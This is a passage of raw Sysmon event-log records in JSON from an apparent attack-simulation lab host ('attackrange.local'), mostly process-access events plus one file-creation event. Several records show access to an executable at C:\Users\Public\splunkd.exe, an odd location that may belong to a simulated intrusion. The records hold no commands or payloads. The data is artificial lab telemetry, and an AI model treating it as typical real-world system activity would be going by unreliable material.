(x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:25.138","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8598,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:25.279\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1381-5F25-0000-001085CD0F00}\r\nTargetProcessId: 4708\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:25.279","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1381-5F25-0000-001085CD0F00}","TargetProcessId":"4708","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8599,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:25.279\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1381-5F25-0000-001085CD0F00}\r\nTargetProcessId: 4708\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:25.279","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1381-5F25-0000-001085CD0F00}","TargetProcessId":"4708","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:25","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8600,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:25.294\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1381-5F25-0000-001085CD0F00}\r\nTargetProcessId: 4708\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:25.294","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1381-5F25-0000-001085CD0F00}","TargetProcessId":"4708","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8601,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:26.154\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:26.154","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8602,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:26.466\r\nProcessGuid: {E2A3D6B1-1381-5F25-0000-001085CD0F00}\r\nProcessId: 4708\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1264-0\\System.ServiceModel.Web.dll\r\nCreationUtcTime: 2020-08-01 07:02:26.466","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:26.466","ProcessGuid":"{E2A3D6B1-1381-5F25-0000-001085CD0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1264-0\\System.ServiceModel.Web.dll","CreationUtcTime":"2020-08-01 07:02:26.466","EventReceivedTime":"2020-08-01 07:02:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8603,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:26.513\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1382-5F25-0000-0010D0D50F00}\r\nTargetProcessId: 4760\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:26.513","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1382-5F25-0000-0010D0D50F00}","TargetProcessId":"4760","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8604,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:26.513\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1382-5F25-0000-0010D0D50F00}\r\nTargetProcessId: 4760\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:26.513","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1382-5F25-0000-0010D0D50F00}","TargetProcessId":"4760","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:26","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8605,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:26.513\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1382-5F25-0000-0010D0D50F00}\r\nTargetProcessId: 4760\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 